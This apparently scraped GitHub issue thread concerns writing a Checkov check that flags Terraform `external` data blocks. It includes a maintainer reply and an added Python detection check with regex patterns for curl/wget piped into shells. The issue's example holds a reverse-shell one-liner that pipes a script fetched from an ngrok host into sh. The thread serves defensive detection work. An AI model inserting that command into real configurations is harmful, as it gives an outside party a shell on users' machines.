Closed GoliTech closed 11 months ago
hey @GoliTech thanks for reaching out.
I'm not sure what exactly the question is: are you looking for a built-in check which would find the issue, or do you want to create a custom check for it? In general we had a check which looked for any `external` use, but it was too noisy and therefore we removed it again. You should always be aware of anything running in an `external` data block, because it can exfiltrate secrets, run malicious code, etc.
@gruebel thanks for the quick response
That is true, I am looking for a check to raise a flag for `external`, but there is no built-in one and I tried to implement it myself; however, after 2 days I still could not implement that. Could you please help me?
I even changed the scan function to:
```python
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck


class CustomCheck(BaseResourceCheck):
    def __init__(self):
        name = "Detect potential reverse shell in external data"
        id = "CUSTOM_REVERSE_SHELL_CHECK"
        supported_resources = ['azurerm_managed_disk']
        categories = [CheckCategories.NETWORKING]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

    def scan_resource_conf(self, conf):
        # Deliberately always true, only to confirm the check is executed at all.
        # scan_resource_conf must return a bare CheckResult, not a (result, message) tuple.
        if 1 == 1:
            return CheckResult.FAILED
        else:
            return CheckResult.PASSED


# A module-level instance is what registers the check with checkov
check = CustomCheck()
```
just to see if the scanner works or not. It looks like checkov does not find this 1==1 condition.
gotcha, you made a small mistake: data checks need to use a different parent class, here is an example https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py
depending on how complex your check is, you could also write it as a YAML-based one, like here https://github.com/bridgecrewio/checkov/blob/main/tests/terraform/checks/data/external/external_check/ExternalData.py
thanks a lot for your help.
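The answer above points at the missing piece: a check for a `data` block has to derive from Checkov's data-check base class rather than `BaseResourceCheck`, which is also why the check in the issue body below never ran. The following is an added example, not code from the thread or from the Checkov project. It assumes the import path `checkov.terraform.checks.data.base_check.BaseDataCheck`, the constructor keyword `supported_data`, the method name `scan_data_conf` and the category `CheckCategories.GENERAL_SECURITY`; the check id `CKV_EXAMPLE_EXTERNAL_1` is a placeholder, the detection heuristics (remote fetch, pipe into an interpreter, inline `sh -c` script) are this example's own choice, and the sample confs are constructed. The detection logic is kept in plain functions so it runs and can be unit-tested without Checkov installed; the class wrapper is only defined when Checkov can be imported.

```python
"""Custom Checkov data-source check for risky `external` programs (added example)."""
import re

try:  # Checkov integration; the detection logic below also runs without it
    from checkov.common.models.enums import CheckCategories, CheckResult
    from checkov.terraform.checks.data.base_check import BaseDataCheck
    HAVE_CHECKOV = True
except ImportError:
    HAVE_CHECKOV = False

# Heuristics chosen for this example (not Checkov policy): an `external`
# program that downloads something and hands it to an interpreter, or that
# runs an inline shell script, deserves a human look.
SHELL_INTERPRETERS = {"sh", "bash", "zsh", "dash"}
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh|dash|python3?|perl)\b")


def program_from_conf(conf):
    """Extract the argv list of an `external` data block.

    Checkov passes attribute values wrapped in a list, e.g.
    {"program": [["sh", "-c", "..."]]}; a bare list is accepted too so the
    function can be exercised on hand-written input.
    """
    program = conf.get("program") or []
    if program and isinstance(program[0], list):
        program = program[0]
    return [str(arg) for arg in program]


def find_findings(program):
    """Return the reasons a program looks risky; an empty list means clean."""
    findings = []
    if not program:
        return findings
    interpreter = program[0].rsplit("/", 1)[-1]  # strip any /bin/ prefix
    if interpreter in SHELL_INTERPRETERS and "-c" in program[1:]:
        findings.append(f"runs an inline shell script via '{interpreter} -c'")
    command_line = " ".join(program)
    if REMOTE_FETCH.search(command_line):
        findings.append("fetches remote content with curl/wget")
    if PIPE_TO_INTERPRETER.search(command_line):
        findings.append("pipes command output into an interpreter")
    return findings


def evaluate(conf):
    """Checkov-style verdict as a string, usable without Checkov installed."""
    return "FAILED" if find_findings(program_from_conf(conf)) else "PASSED"


if HAVE_CHECKOV:
    class ExternalProgramCheck(BaseDataCheck):
        def __init__(self):
            name = "Ensure external data source programs do not fetch and execute remote code"
            id = "CKV_EXAMPLE_EXTERNAL_1"  # placeholder id for this example
            supported_data = ["external"]  # data-source type, not a resource type
            categories = [CheckCategories.GENERAL_SECURITY]
            super().__init__(name=name, id=id, categories=categories, supported_data=supported_data)

        # entity_type is accepted optionally in case the registry passes it (assumption)
        def scan_data_conf(self, conf, entity_type=None):
            return CheckResult.FAILED if evaluate(conf) == "FAILED" else CheckResult.PASSED

    check = ExternalProgramCheck()  # module-level instance registers the check


# Constructed sample confs in the shape Checkov hands to a data check.
SAMPLE_CONFS = {
    "piped_download": {"program": [["sh", "-c", "curl https://example.invalid/payload | sh"]]},
    "inline_only": {"program": [["/bin/bash", "-c", "echo hello"]]},
    "benign_script": {"program": [["python3", "./read_version.py"]]},
    "no_program": {},
}

if __name__ == "__main__":
    for label, conf in SAMPLE_CONFS.items():
        print(f"{label:15} {evaluate(conf):7} {find_findings(program_from_conf(conf))}")
```

Drop the file into the directory passed to `checkov --external-checks-dir` and the `external` block from the issue is reported as FAILED, while a data source that merely runs a local script passes. Keeping the verdict logic outside the class is what makes the heuristics easy to tune against real configurations before they go into a policy.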
**Describe the issue**
If there is a malicious code block inside the configuration, checkov could not find it.
**Examples**
```hcl
data "external" "example" {
  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
}
```
**Version (please complete the following information):**
**Additional context**
I even created a check but it did not work:
```python
from enum import Enum

from checkov.common.models.enums import CheckResult, CheckCategories
from checkov.terraform.checks.resource.base_resource_check import BaseResourceCheck


# This local enum shadows the CheckCategories imported above
class CheckCategories(Enum):
    SECURITY = "SECURITY"


class CustomCheck(BaseResourceCheck):
    def __init__(self):
        name = "Detect potential reverse shell in external data"
        id = "CUSTOM_REVERSE_SHELL_CHECK"
        supported_resources = ["data"]
        categories = [CheckCategories.SECURITY]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

    # no scan_resource_conf() is defined here


check_id = CustomCheck()
```